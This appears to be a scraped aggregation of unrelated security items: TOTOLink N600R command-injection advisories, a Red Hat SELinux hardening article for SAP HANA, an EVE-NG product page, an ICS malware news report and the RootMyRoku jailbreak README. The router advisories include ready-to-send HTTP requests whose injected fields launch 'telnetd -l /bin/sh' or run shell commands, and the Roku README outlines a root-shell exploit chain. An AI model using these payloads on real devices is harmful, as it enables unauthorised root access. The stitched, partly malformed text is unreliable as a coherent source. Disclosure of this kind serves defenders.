TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicename parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the devicename parameter to V7, then passes the matching content to v18 through the sprintf function, and finally executes the content in v18 through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"1",
    	"deviceName":"';telnetd -l /bin/sh -p 10002;'“
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28910: IOT_vuln/TOTOLink/N600R/9 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the webwlanidx parameter in /setting/setWebWlanIdx.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the webwlanidx parameter is passed to V5, and then the matching content is passed to V7 through the sprintf function, and then V7 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setWebWlanIdx",
    	"webWlanIdn":"0test$(ls>/tmp/4.txt;)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28909: IOT_vuln/TOTOLink/N600R/3 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the langtype parameter in /setting/setLanguageCfg.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the langtype parameter is passed to V6, and then the matched content is formatted into V9 through the sprintf function, and V9 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 135
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647869489:2
    Connection: close
    
    {"topicurl":"setting/setLanguageCfg",
    "langType":"cn$(1s>/tmp/2.txt)"
    	"operationMode":	0,
    	"loginFlag":	0,
    	"lanIp":	"192.168.0.1",
    	"wanConnStatus":	"connected",
    	"multiLangBt":	"",
    	"langFlag":	0,
    	"helpBt":	1,
    	"languageType":	"cnnn",
    	"helpUrl_":	"",
    	"productName":	"N600R",
    	"fmVersion":	"V5.3c.7159",
    	"webTitle":	"",
    	"copyRight":	"",
    	"autoLangBt":	0,
    	"CSID":	"CS160R"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28906: IOT_vuln/TOTOLink/N600R/2 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicemac parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the devicemac parameter is passed to V6, and then the content matched by V6 is formatted into v18 through the sprintf function. Finally, v18 is executed through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"';telnetd -l /bin/sh -p 10002;'",
    	"deviceName":"zoe"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28905: IOT_vuln/TOTOLink/N600R/1 at main · EPhaha/IOT_vuln

After extensive testing on RHEL 8.2, 8.4, 8.6 and 9 using the SAP HANA validation test suite, Red Hat’s engineering team concluded that SELinux can run in Enforcing mode with minimal impact to database performance. This is important because it means that RHEL customers will be able to apply higher security levels to their hosts running SAP HANA and tailor the policies to their needs.

SAP HANA is SAP’s in-memory database (DB) that has been around since 2010. It is used as the backbone of their main applications like Enterprise Resource Planning (ERP) or Business Warehouse (BW), or as a standalone application since it incorporates many features that are useful for Big Data and analytics.

There are other databases (Oracle, SQL Server, DB2, MaxDB and Sybase) on which SAP applications can run, but starting in 2027 customers wishing to maintain regular support will have to migrate to the new ERP suite, SAP S/4HANA. The suite only runs on SAP HANA, and Red Hat Enterprise Linux (RHEL) is one of two supported platforms for the database.

All of SAP’s applications are critical since they sit at the core of the company, and SAP HANA is especially resource demanding. Given this criticality, IT departments need to drive the highest levels of security and performance for the SAP ecosystem to limit impact on the company’s operations.

In February 2022, after extensive testing on RHEL 8.2, 8.4, 8.6 and 9 using the SAP HANA validation test suite (which is used by SAP to assess if a system can run SAP HANA at acceptable performance levels), Red Hat’s engineering team concluded that SELinux can run in Enforcing mode (the recommended mode) with a minimal impact to database performance (around 2%, which is acceptable and in line with SAP standards). 

SAP has already modified the OSS Note with the recommendations for SAP HANA on RHEL 8, and will do so for other versions once they have completed the tests themselves.

This is important because it means that RHEL customers will be able to apply higher security levels to their hosts running SAP HANA and tailor the policies to their needs. This adds another piece to the Red Hat platform for SAP workloads that plays a crucial role in providing everything RHEL customers need to manage the entire lifecycle of the SAP hosts in an easier way with a stronger security posture.

**What is SELinux?**

Security-Enhanced Linux (SELinux) is a Linux Security Model (LSM) that allows defining security policies to implement mandatory access controls (MAC), providing a very granular layer to strengthen the OS against attacks. The underlying idea is to regulate or constrain the possible actions of a subject (usually a process) on a target (files, memory, I/O devices, network resources, etc.). 

The policies contain rules that are evaluated when a subject tries to access a target to determine whether access will be allowed. In addition to MAC, SELinux is also based on and implements role-based access control (RBAC).

In SELinux, processes run in domains so they are separated from each other. Each process is assigned a username, a role and a domain, and each target is labeled with a name, role and a type. In the policies, the domains that users need to belong to in order to execute an action on a target (for example to bind to a listening port) are specified. If a process is compromised, the attacker will only have access to the resources in the domain that process has been assigned to, avoiding the danger of that attacker having access to system files and gaining control of the whole operating system.

This is also a very useful feature for applications deployed in containers, as it provides an additional layer of isolation between the containers and the hosts on which they run.

SELinux has 3 operation modes:

*   Enforcing. The policies are active and enforced.
    
*   Permissive. The system uses the policies but it does not deny access to the targets, it just writes the approval and denial messages in the system logs (this mode is normally used to test policies before rolling them out to production).
    
*   Disabled.
    

**Further recommendations**

There are other security guidelines that Red Hat’s engineering team have compiled in this whitepaper as a result of this testing.

**Minimize RHEL and package installation**

The first is to carry out a minimal installation of RHEL on the servers that will host SAP HANA in order to minimize the opportunities for malicious exploits. There are many packages in the OS that aren’t used by a host that only runs SAP HANA, so there is no need to install them as they can be potential points of attack. Besides this, having a minimal installation will make the server update process much easier.

From RHEL 7 on there is an option that allows you to install only the packages needed for basic functionality. In addition to that, the compat-sap c++ and libtool-ltdl will need to be installed as well, as they are used by the DB. Depending on the customer scenario, they might need to install additional packages on top of the minimal installation, but the recommendation from Red Hat is to go for the minimal RHEL installation plus the two additional packages, and then add the rest that are necessary depending on the usage of the DB.

Complementing the minimal package installation, we can use a plugin to whitelist application RPMs. The fapolicyd RPM plugin registers any update done with YUM or RPM package managers and notifies the fapolicyd daemon about changes in the install database. If there is an attempt to install an RPM which is not in the fapolicyd whitelist, it will be denied.

Another recommendation is to disable all of the network services that are not strictly needed for the normal functioning of SAP HANA and for the applications and users to connect to it. Here, as with the OS packages, the fewer network services listening on different ports, the lower the chances of attack. And since network services need to be regularly patched to avoid newly discovered exploits, their maintenance will be easier if their number is reduced. Some of the services whose deactivation is highly recommended are vsftpd (Very Secure FTP Daemon) and  telnet, because the transactions of the former are unencrypted and the latter is an unsecured protocol.

**Restrict user privileges**

The next recommendation for hardening the security of RHEL hosts running SAP HANA is to restrict the number of users that can run the sudo command and thus be able to execute other commands as root.

It’s also very important to disable the possibility of logging in with the root user via ssh, so that it can only be utilized locally on the host. Having another account (with permissions to log on via ssh) that can run a reduced set of administrative commands using ‘su -’ should be enough.

All SAP installations create a user called <sid>adm (‘sid’ is the SAP installation name or identifier) and it has unrestricted permissions over all the SAP processes and files. It is similar to root at SAP level and it also exists for SAP HANA. It is recommended to limit the number of people with access to this user and change its password as soon as the system is handed over to the admin team after installation and set up.

**Automate logouts and password expiry**

The next set of recommendations concerns the password and login policies for the users. It is advised to enable automatic logouts after a certain time of inactivity, to define the validity period of passwords as well as how often they can be changed and to lock out users after a number of failed attempts, so that brute force attacks are prevented.

**Restrict user file and home directory permissions**

There are also things to consider regarding file and user home directory permissions. Newly created files should not by default be readable or modifiable by users other than the one that has created them. In order to achieve this, the default umask for new files should be set to 077, and home directories should only be accessible by their owner.

**Encrypt hard drives**

An added layer of security is achieved by using encrypted hard drives. In order to unlock root and secondary volumes that are encrypted, RHEL provides an implementation of the Policy-Based Decryption (PBD) that allows different unlocking methods to be combined (like user password, Trusted Platform Module devices (TPM), smart cards, etc.) in the form of policies so that the volumes can be unlocked in different ways.

The implementation that comes with RHEL consists of the Clevis framework and plugins called pins. The recommendation is to use one of the subcategories of PBD called Network Bound Disk Encryption (NBDE) with which root volumes can be encrypted (on physical and virtual machines) and the encryption key is tied to an external server (or servers) in a secure and anonymous way across the network.

The node that has the root volumes to be unlocked uses a Clevis client, and the external server(s) are Tang server(s). When the node boots, it tries to connect to the external Tang server(s) performing a cryptographic handshake. If it can reach the minimum number of servers that has been defined (or the only server if there is only one Tang server) it will be able to construct its decryption key to unlock the volume and continue booting. This mechanism makes it more difficult for attackers to gain control of the node because they would need access to it and to the Tang server(s).

**Encrypt network traffic**

SAP HANA supports the use of encrypted channels for both client connections (from applications, users, administration clients or data provisioning tools) and internal DB process communication, so it is recommended to use this feature when the network is not protected in another way.

Another possibility is to use VPN tunnels to transfer encrypted information. It is very important to have a well-defined network topology for SAP HANA tailored to the use cases of the customer. The SAP HANA Security Guide contains many more recommendations that should be taken into account when planning a SAP HANA landscape deployment. A particularly important one is to configure SSL between the DB and the clients.

**Conclusion**

This set of recommendations allows customers to run their SAP workloads in an environment with greater security controls while maintaining very granular control of the processes that keep performance levels at an optimal level. Find out more here: Red Hat Enterprise Linux Security Hardening Guide for SAP HANA 2.0.

Security recommendations for SAP HANA on RHEL

An OS Command Injection vulnerability in the configuration parser of Eve-NG Professional through 4.0.1-65 and Eve-NG Community through 2.0.3-112 allows a remote authenticated attacker to execute commands as root by editing virtualization command parameters of imported UNL files.

**Home**

EVE - The Emulated Virtual Environment  
For Network, Security and DevOps  
Professionals

EVE - The Emulated Virtual Environment  
For Network, Security and DevOps  
Professionals

EVE - The Emulated Virtual Environment  
For Network, Security and DevOps  
Professionals

EVE - The Emulated Virtual Environment  
For Network, Security and DevOps  
Professionals

EVE - The Emulated Virtual Environment  
For Network, Security and DevOps  
Professionals

**Important Note: LOG4J – CVE-2021-45046 CVE-2021-44228 CVE-2022-27903 DOES NOT affect EVE-NG.**

**EVE-NG Professional Edition:**

EVE-NG PRO platform is ready for today’s IT-world requirements. It allows enterprises, e-learning providers/centers, individuals and group collaborators to create virtual proof of concepts, solutions and training environments.

EVE-NG PRO is the first clientless multivendor network emulation software that empowers network and security professionals with huge opportunities in the networking world. Clientless management options will allow EVE-NG PRO to be as the best choice for Enterprise engineers without influence of corporate security policies as it can be run in a completely isolated environment.

   

EVE Professional Edition: 4.0.1-86 EVE-NG Professional (01 May 2022)

_Release notes link_

Download EVE Professional

**_Upgrade notes:_**

_**If you are upgrading your EVE PRO or EVE LC form Versions 3.0.1-16 or later, please follow the link below:**_

_Upgrade EVE Pro or LC to the newest version_

_**If you are upgrading your EVE PRO or EVE LC form Versions 2.0.6.52 or earlier, please Contact to the EVE Live Helpdesk:**_

_Live Helpdesk_

EVE-NG Professional/Learning Center Cookbook

**_EVE-NG PRO/LC Cookbook version 4.14 (23 October, 2021)_**_Download link EVE PRO/LC Cookbook_ **Section updates:** 3.3 Ubuntu download link update10.6 Remove Cloud interfaces for Editor and User14.1.5 Custom web page for server-gui docker14.1.6 Custom web page SSL for server-gui docker

****Some Features:****

EVE brings You the power You need to mastering your network within multivendor environment designing and testing.

  

*   KVM HW accelaration
*   Topology designer “click and play”
*   Import/export configuration
*   Labs xml file format
*   Picture import and maps “click and play”
*   Custom Kernel support for L2 protocols
*   Memory optimization ( UKSM )
*   CPU Watchdog
*   Full HTML5 User Interface
*   Ability to use without additionnals tools
*   Multiusers
*   Interaction with real network fully supported
*   Simultaneous lab instances
*   Derivated  from Ubuntu LTS 18.04 server for long term support 

****EVE-NG-PRO Emulation Software****

_The brand new structure is created with many updated features and improvements._  

*   Dynamic console porting, no limits, fixing issues for multi user consoling, Telnet porting choose is random
*   Hot links, interconnection running nodes, ports immediately response, shut no shut, Ethernet only
*   1024 nodes support per lab
*   Docker containers support
*   HTML desktop console to EVE management, clientless EVE management
*   Closing feature of running lab placing it to running folder, option run more than one lab simultaneously
*   Import/export configs for eve lab to/from local PC
*   Multiuser support, Administrator role only
*   EVE User account access time limitation
*   NAT cloud, integrated NAT option with DHCP on the EVE
*   Integrated Wireshark capture using docker, ethernet only
*   Multi configurations for single lab
*   Lab design features, links and objects
*   Custom template for own node deployment
*   Lab timer for self-training
*   EVE Labs control management
*   Information display of running labs and nodes per user. Admin control of processes
*   Link quality bandwidth, delay, jitter and loss set feature
*   EVE Cluster
*   Google Cloud EVE PRO support

_Upcoming features in EVE-NG PRO:_

*   Current version display and the newest available  
    
*   Fix permissions button on web  
    
*   New lab design options
*   Lab search option
*   Live lab resource widget, CPU, RAM
*   Lab timer, countdown improvement

CVE-2022-27903

IBM QRadar SIEM 7.3, 7.4, and 7.5 in some senarios may reveal authorized service tokens to other QRadar users. IBM X-Force ID: 210021

CVE-2021-38919: Security Bulletin: IBM QRadar SIEM is vulnerable to using components with Known Vulnerabilities

The recent discovery of highly customized malware targeting programmable logic controllers has renewed concerns about the vulnerability of critical infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA, FBI, and others, this week urged critical infrastructure organizations — especially in the energy sector — to implement defenses against a set of highly sophisticated cyberattack tools designed to target and disrupt industrial environments.

The warning applies particularly to ICS and OT networks using programmable logic controllers (PLCs) from Schneider Electric and Omron and servers based on Open Platform Communications Unified Architecture (OPC UA). The advisory was prompted by the recent discovery of three malware tools custom-built to target these technologies and manipulate them in dangerous and potentially destructive ways. However, the malware can be adapted to attack other ICS technologies as well.

CISA's advisory contained a series of mitigation measures that it recommended organizations implement proactively to reduce exposure to the new threat.

Mandiant analyzed the new attack tools recently in partnership with Schneider and is collectively tracking them under the name INCONTROLLER. In a report this week, the security vendor described the malware as having an "exceptionally rare and dangerous" capability and posing a critical risk to organizations that use the targeted equipment. Mandiant compared INCONTROLLER to previous ICS-specific threats such as Stuxnet, which was used to destroy hundreds of centrifuges at an Iranian nuclear-enrichment facility in 2010, and Industroyer, which caused a power outage in Ukraine in 2016.

**Work of a Russian State-Sponsored Group?**  
"We believe INCONTROLLER is very likely linked to a state-sponsored group given the complexity of the malware, the expertise and resources that would be required to build it, and its limited utility in financially motivated operations," says Rob Caldwell, director of industrial control systems and operational technology at Mandiant. He says Mandiant has been unable to associate the malware with any previously tracked group but believes those behind it are most likely Russia-linked. "While our evidence connecting INCONTROLLER to Russia is largely circumstantial, we note it given Russia's history of destructive cyberattacks, its current invasion of Ukraine, and related threats against Europe and North America."

Mandiant identified one of the attack tools as "Tagrun," a tool for scanning OPC environments, enumerating OPC servers, harvesting data from them, and brute-forcing credentials. The security vendor identified the tool as likely used for conducting reconnaissance on industrial networks. Mandiant has dubbed the second tool as "Codecall," which it described as a framework that uses two common industrial protocols — Modbus and Codesys — to communicate and interact with at least three Schneider PLCs. The malware can identify Schneider and other Modbus-enabled devices on a network and connect to them using the two protocols. The third tool, "Omshell," targets Omron PLCs via HTTP, Telnet, and a proprietary Omron protocol. It is designed to interact with a mechanism on Omron devices for monitoring the safe running of so-called servo motors used in industrial applications. The malware can gain shell access to Omron PLCs and take a variety of malicious actions, including wiping device memory, resetting a device, loading backup data, and executing arbitrary code on it.

Collectively the malware tools have capabilities that allow attackers to surveil and collect data from target industrial environments that they can then use to identify high-value systems and to launch potentially catastrophic attacks against them in industrial settings. Potential attack scenarios include threat actors using Omshell and/or Codecall to crash targeted PLCs and disrupt operations; sending malicious commands to PLCs to sabotage industrial processes; or disabling safety controllers to cause physical destruction in a plant or industrial setting.

"The components of INCONTROLLER contain more sophisticated methods of interacting with and attacking or modifying the targeted devices than seen in previous ICS-specific malware," Caldwell says. These components are designed to make interaction with PLC devices easy for attackers with little detailed knowledge of the targeted ICS protocols. "Further, these components are modular and could be extended to target additional devices or add additional capabilities," he says.

Mandiant said it is also tracking two other tools targeted at Windows-based systems that appear to be related to INCONTROLLER activity. One of them exploits a known vulnerability, CVE-2020-15368, to install and exploit a vulnerable driver on target systems, and the other is a backdoor that enables reconnaissance activity. The tools could be used to support a threat actor's broader goals in an industrial cyberattack, Mandiant said.

**A Clear and Present Danger to Industrial Environments**  
ICS security vendor Dragos listed a total of 16 devices and software tools from Omron and Schneider that it said the malware was designed to interact with and exploit. The technologies are used in a wide range of industry verticals. But Dragos said its analysis of the malware suggests it is targeted mostly at equipment in liquefied natural gas (LNG) and electric power environments.

Dragos is collectively tracking the attack tools as "PIPEDREAM" and the threat actors behind it as "CHERNOVITE." A whitepaper that the company released this week on the threat identified the threat actor as having the ability — among other things — to manipulate the torque and speed of Omron servo motors in a way that could cause enough physical destruction to result in loss of life. Dragos' whitepaper listed several other malicious actions that threat actors could use the malware for, including triggering denial of control and denial for view for ICS operators; disrupting operating technology by masquerading as a trusted process; disabling process controllers to extend time-to-recovery from an incident; and undermining authentication and encryption mechanisms in OT environments.

"PIPEDREAM is a clear and present threat to the availability, control, and safety of industrial control systems and processes endangering operations and lives," Dragos said.

News of the malware tools comes just days after reports of Ukraine's computer emergency response team (CERT-UA) thwarting an effort by Russia's Sandworm group to disrupt the country's power grid using Industroyer, one of the first known malware tools targeted specifically at the electric grid. So far, researchers have discovered at least seven highly sophisticated ICS-specific attack tools, which include Stuxnet, Industroyer, Triton, and BlackEnergy.

Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, says the combined tools in this case were built to search for specific devices, to understand their operational parameters, to gain credentialed access, and to remotely control various legitimate functions of the devices for their intended objectives. "These are customizable based on the devices targeted but can be modified to target additional devices that leverage the same protocols," she says.

Jablanski says that options for thwarting attacks become scarce when threat actors have the credentials and know how to use devices based on their design, protocols, and features.

It's presently unclear in what host environment the newly discovered tools were found. But typically, some stop-gap measures for mitigating exposure to the threat would include disabling unnecessary functionality, introducing access controls to limit legitimate users who communicate with the device, and taking password management seriously. "Device hardening to limit the susceptibility and severity of cyber incidents is a staple of defense in depth strategies across ICS/OT environments," she says.

Eric Byres, CEO of aDolus Technology, says the new tools highlight a recent trend away from previous attacks where threat actors gained access to an OT environment by leapfrogging to it from the IT network. Those kinds of attacks have become less common with many organizations tightening OT security. So, sophisticated attackers are finding other ways to establish access to their victims' OT networks, he says pointing to Stuxnet as an example.

"Stuxnet did it through a combination of infected USB flash drives, printer sharing, and modified PLC logic files," he says. Similarly, Dragonfly, which was Russian in origin, attacked the manufacturers of OT control equipment and replaced the software they supplied to their industrial customers with trojanized versions.

"These supply chain-driven attacks are now becoming the preferred method for nation-state attackers, especially the Russian spy agencies," Byres says. "By going after OT suppliers rather than the OT systems directly, they get tremendous multiplication effects."

New Malware Tools Pose 'Clear and Present Threat' to ICS Environments

Roku devices running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable to Arbitrary file modification.

**Root My Roku**

A persistent root jailbreak for RokuOS v9.4.0 build 4200 devices using a Realtek WiFi chip.  
A big thank you to ammar2 and popeax from the Exploitee.rs Discord for helping discover and develop this.

**Features**

*   Spawns a telnet server running as root on port 8023.
*   Enables the low-level hardware developer mode.
*   Adds many new secret screens and debug features to the main menu.
*   _Blocks channel updates, firmware updates, and all communication with Roku servers._

**Usage**

1.  Download any new channels you might want to use after the jailbreak.  
    Once you jailbreak your device, all communication with Roku's servers will be blocked.  
    Any channels you currently have installed should continue to work.  
    Please see the F.A.Q. below for details.
2.  Enable Developer Settings on your Roku device.
3.  Download the latest dev-channel.zip from the releases page.
4.  Upload dev-channel.zip using the guide from the previous step.
5.  Follow the prompts on screen, then reboot to jailbreak!

**Applications**

*   Using a Roku TV to drive ambient lighting: https://www.youtube.com/watch?v=V\_enynuw-rc (details).

**F.A.Q.****Which devices does this affect?**

Affected devices include _almost all_ Roku TVs and some Roku set-top boxes.  
In theory, any Roku device running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable.  
You can check your current software version from Settings -> System -> About.  
While it is not possible to manually check your WiFi chip manufacturer, the channel provided for this exploit will tell you if your device is vulnerable or not.

**Can this brick my device?**

No! It makes no changes to the underlying firmware that the device runs.  
If anything bad happens, a factory reset will always recover your device.

**How do I un-jailbreak my device?**

You have two options:

*   Factory reset your device. This will clear NVRAM and remove the jailbreak.
*   Using the telnet server on port 8023, delete /nvram/udhcpd-p2p.conf and reboot.

**Is Roku aware of this exploit?**

Some of the critical components required for the exploit chain no longer work in RokuOS v10.  
The NFS mount option that is used for arbitrary file modification gets disabled, and the service used for persistence and privilege escalation is no longer used.

While RokuOS v10 has started rolling out, many devices have not received the update yet.

**Why does the jailbreak block communication with Roku servers?**

This is a precautionary measure to prevent the jailbreak from being disabled or removed.  
In the past, Roku has taken some _creative_ measures to forcefully patch jailbroken devices. One such example was an update to the screensaver channel that would check for a telnet service, connect to it, and command it to un-root and update the device.

Unfortunately, the servers used for channel and firmware updates the same ones used to communicate with Roku in general. Blocking updates means that no new channels can be installed and that certain features like "My Feed" and "Search" will no longer work.  
Applications that communicate with other services (e.g. YouTube, Netflix, HBO) will still work.

**How can I prevent my non-jailbroken Roku from updating?**

Edit your modem/router's DNS settings to use the IP address of dns.rootmyroku.com.  
You can find the current IP address using nslookup, dig, or online DNS lookup tools.

**Why should I trust the code you execute on my device?**

You don't have to!

All of the files required to reproduce this exploit are available in this repo:

*   The local channel used to load the remote payload is available under local.
*   The remote payload loaded over NFS is available under remote.
*   The script used to create the NFS and DNS servers are available under server.

**Exploit Details**

There's two main vulnerabilities that make this exploit possible: arbitrary file modification and privilege escalation.

RokuOS actually does a decently good job at sandboxing channels to prevent them from accessing the underlying filesystem. In addition to running as a restricted user, a software sandbox, and a chroot jail, Roku's Linux kernel has grsecurity patches applied. These patches mitigate common exploit techniques used in jailbreaks and privilege escalation. Furthermore, the entire root filesystem is read-only and baked into the firmware. Only persistent storage (NVRAM) and temp directories are writable.

**Arbitrary File Modification**

Two things conspired to allow arbitrary file modification. The first was that an undocumented pkg_nfs_mount channel manifest option. This option was meant to reduce the software development lifecycle when creating a channel by allowing the channel's source code to be hosted on a different machine using NFS. This removes the need to re-package and re-upload channels after every code change.  
The second was a shortcoming of the grsecurity patches and the Linux kernel in general: symlinks over NFS act weird. While grsecurity was configured specifically to not allow symlinking to directories owned by other users, the ownership and permission checks no longer work properly when the symlink resides on an NFS mount. This allows us to create a symlink in the remote channel's package that points to the root of the main filesystem. (See remote/source/Main.brs for details.)  
This provided us with the ability to modify persistent storage and temp files, but only as the app user.

**Privilege Escalation**

From there, we discovered that the process that configures udhcpd (a DHCP service used for pairing speakers and remotes) for Realtek chipsets could be made to read a config file from NVRAM, a location that the app user has access to. If we could leverage it properly, it would let us manipulate a service running as the root user and also give us a means of persisting across reboots. Thankfully, udhcpd has an option for executing a script (notify_file) with a single parameter (lease_file) whenever a DHCP lease is created. It wasn't perfect though: the udhcpd service would only run the script if it has the "execute" bit set. While we could create arbitrary files using our previous exploit, we didn't have control over the file's permissions and as a result, none of the payload scripts we create are marked as executable. To make matters more difficult, we couldn't pass the payload script as lease_file to the built-in shell executables because udhcpd would overwrite the script contents first.  
Ultimately, the solution involved creating a lease_file value polyglot that is both an AWK script and a legal file name. (See remote/bootstrap.conf for details.)

**Footnote**

If anyone at Roku is reading this: you desperately need a _real_ bug bounty program.

Without one, there's little incentive to research and report vulnerabilities when you're not sure if you'll be rewarded for your efforts or not. While we took this project on for fun as a hobby, almost no professional security researchers are going to dedicate as much effort as we did for a "maybe".

CVE-2022-27152: GitHub - llamasoft/RootMyRoku: A persistent root jailbreak for most Roku devices.

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

Tag

#telnet